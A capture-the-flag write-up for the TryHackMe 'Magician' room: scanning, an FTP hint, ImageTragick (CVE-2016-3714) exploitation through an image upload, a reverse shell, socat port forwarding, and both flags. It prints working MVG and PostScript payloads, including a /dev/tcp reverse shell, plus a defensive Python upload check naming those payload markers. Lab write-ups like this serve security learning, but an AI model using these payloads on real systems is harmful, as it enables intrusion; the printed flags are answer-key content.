Magician

https://tryhackme.com/room/magician

root@ip-10-10-73-181:~# nmap -sC -sV 10.10.212.13

Starting Nmap 7.60 ( https://nmap.org ) at 2022-12-17 22:26 GMT
Nmap scan report for ip-10-10-212-13.eu-west-1.compute.internal (10.10.212.13)
Host is up (0.00098s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        vsftpd 2.0.8 or later
8080/tcp open  http-proxy
| fingerprint-strings: 
|   FourOhFourRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 17 Dec 2022 22:27:00 GMT
|     Connection: close
|     {"timestamp":"2022-12-17T22:27:00.655+0000","status":404,"error":"Not Found","message":"No message available","path":"/nice%20ports%2C/Tri%6Eity.txt%2ebak"}
|   GetRequest: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 17 Dec 2022 22:27:00 GMT
|     Connection: close
|     {"timestamp":"2022-12-17T22:27:00.488+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   HTTPOptions: 
|     HTTP/1.1 404 
|     Vary: Origin
|     Vary: Access-Control-Request-Method
|     Vary: Access-Control-Request-Headers
|     Content-Type: application/json
|     Date: Sat, 17 Dec 2022 22:27:00 GMT
|     Connection: close
|     {"timestamp":"2022-12-17T22:27:00.604+0000","status":404,"error":"Not Found","message":"No message available","path":"/"}
|   RTSPRequest: 
|     HTTP/1.1 505 
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 465
|     Date: Sat, 17 Dec 2022 22:27:00 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505 
|     HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505 
|_    HTTP Version Not Supported</h1></body></html>
|_http-title: Site doesn't have a title (application/json).
8081/tcp open  http       nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: magician
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 02:D1:B8:E6:23:01 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.93 seconds

We have 3 open ports: 21, 8080 and 8081.

Let's try connecting over FTP first.

root@ip-10-10-73-181:~# ftp 10.10.212.13
Connected to 10.10.212.13.
220 THE MAGIC DOOR
Name (10.10.212.13:root): anonymous
331 Please specify the password.
Password:
230-Huh? The door just opens after some time? You're quite the patient one, aren't ya, it's a thing called 'delay_successful_login' in /etc/vsftpd.conf ;) Since you're a rookie, this might help you to get started: https://imagetragick.com. You might need to do some little tweaks though...
230 Login successful.
ftp> ls
550 Permission denied.
ftp: bind: Address already in use
ftp> cd /
550 Permission denied.
ftp> 

We get a hint. However, we can't go any further with this service.

The hint points us to CVE-2016-3714.

We are therefore going to exploit this vulnerability. For that, we will use this GitHub repository.

Image Tragik 1 & 2
Exploit v1
Simple reverse shell

push graphic-context
encoding "UTF-8"
viewbox 0 0 1 1
affine 1 0 0 1 0 0
push graphic-context
image Over 0,0 1,1 '|/bin/sh -i > /dev/tcp/ip/80 0<&1 2>&1'
pop graphic-context
pop graphic-context

Exploit v2
Simple id payload

%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
then use convert shellexec.jpeg whatever.gif

We create a file image.png and paste in the code of exploit 1, inserting our IP address and port 4444.

Then we upload this image through the site's form and start a listener on our machine.

root@ip-10-10-73-181:~#  rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.73.181] from (UNKNOWN) [10.10.212.13] 60864
bash: cannot set terminal process group (957): Inappropriate ioctl for device
bash: no job control in this shell
magician@magician:/tmp/hsperfdata_magician$ id
id
uid=1000(magician) gid=1000(magician) groups=1000(magician)

The vulnerability is exploited.

All that remains is to read the user flag.
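The upload form accepted an MVG script named image.png, which is what made this exploit possible. As an added example (not part of the original writeup or the room), the check below shows what the upload handler should have done before handing the file to ImageMagick: verify that the magic bytes match the claimed extension and reject text-based ImageMagick/Ghostscript inputs outright (the `push graphic-context` and `%!PS` prefixes are the two payload formats quoted above). The sample uploads are constructed for the demonstration; the filenames and thresholds are assumptions.

```python
# Constructed sample uploads (not from the original page): a genuine PNG,
# an MVG script disguised as image.png and a PostScript file disguised as .gif.
SAMPLES = {
    "photo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "image.png": b"push graphic-context\nviewbox 0 0 1 1\nimage Over 0,0 1,1 '|id'\n",
    "whatever.gif": b"%!PS\nuserdict /setpagedevice undef\n",
}

# Magic bytes an upload must start with for the extension it claims.
MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}

# Prefixes of text-based inputs that ImageMagick would happily parse as
# MVG (exploit v1) or hand to Ghostscript (exploit v2) regardless of extension.
SCRIPT_MARKERS = (b"push graphic-context", b"%!PS")


def check_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for a file about to be processed by ImageMagick."""
    ext = filename[filename.rfind("."):].lower() if "." in filename else ""
    if ext not in MAGIC:
        return False, "extension not allowed"
    # Ignore leading whitespace so a padded script is still caught.
    head = data[:64].lstrip()
    for marker in SCRIPT_MARKERS:
        if head.startswith(marker):
            return False, "script-like content (ImageTragick indicator)"
    if not any(data.startswith(m) for m in MAGIC[ext]):
        return False, "magic bytes do not match extension"
    return True, "ok"


if __name__ == "__main__":
    for name, content in SAMPLES.items():
        accepted, reason = check_upload(name, content)
        print(f"{name}: {'ACCEPT' if accepted else 'REJECT'} ({reason})")
```

Only the real PNG passes; the two payload files are rejected before ImageMagick ever sees them, which is the point at which this room's foothold would have been denied (alongside disabling the MVG and PS coders in ImageMagick's policy.xml, the fix documented at imagetragick.com).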

magician@magician:/tmp/hsperfdata_magician$ cd /home/magician
magician@magician:~$ ls -la
ls -la
total 17204
drwxr-xr-x 5 magician magician     4096 Feb 13 07:19 .
drwxr-xr-x 3 root     root         4096 Jan 30 10:43 ..
lrwxrwxrwx 1 magician magician        9 Feb  6 13:38 .bash_history -> /dev/null
-rw-r--r-- 1 magician magician      220 Apr  4  2018 .bash_logout
-rw-r--r-- 1 magician magician     3771 Apr  4  2018 .bashrc
drwx------ 2 magician magician     4096 Jan 30 10:43 .cache
drwx------ 3 magician magician     4096 Jan 30 10:43 .gnupg
-rw-r--r-- 1 magician magician      807 Apr  4  2018 .profile
-rw-r--r-- 1 magician magician        0 Jan 30 10:43 .sudo_as_admin_successful
-rw------- 1 magician magician     7546 Jan 31 03:50 .viminfo
-rw-r--r-- 1 root     root     17565546 Jan 30 11:55 spring-boot-magician-backend-0.0.1-SNAPSHOT.jar
-rw-r--r-- 1 magician magician      170 Feb 13 07:19 the_magic_continues
drwxr-xr-x 2 root     root         4096 Feb  5 05:14 uploads
-rw-r--r-- 1 magician magician       24 Jan 30 11:30 user.txt
magician@magician:~$ cat user.txt
cat user.txt
THM{simsalabim_hex_hex}

There is another hint in the /magician directory.

magician@magician:~$ cat the_magic_continues
cat the_magic_continues
The magician is known to keep a locally listening cat up his sleeve, it is said to be an oracle who will tell you secrets if you are good enough to understand its meows.

A local listener? Let's use the netstat command. It reveals a listener bound to localhost on port 6666.

Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name    
tcp        0      0 127.0.0.1:6666          0.0.0.0:*               LISTEN      -                

We will forward this local port using socat. We transfer the socat binary from our machine and use it to forward port 6666 to port 7777.

magician@magician:~$ wget http://10.10.73.181:8000/socat
magician@magician:~$ chmod +x socat
magician@magician:~$ ./socat tcp-listen:7777,reuseaddr,fork tcp:localhost:6666

If we connect with the browser on port 7777, a page is displayed. It lets us read files, in particular the root.txt file.

This file is base64-encoded. All that remains is to decode it.

root@ip-10-10-73-181:~# echo "VEhNe21hZ2ljX21heV9tYWtlX21hbnlfbWVuX21hZH0K" | base64 -d
THM{magic_may_make_many_men_mad}

Summary

See https://imagetragick.com/

See PayloadsAllTheThings

See https://www.cyberciti.biz/faq/linux-unix-tcp-port-forwarding/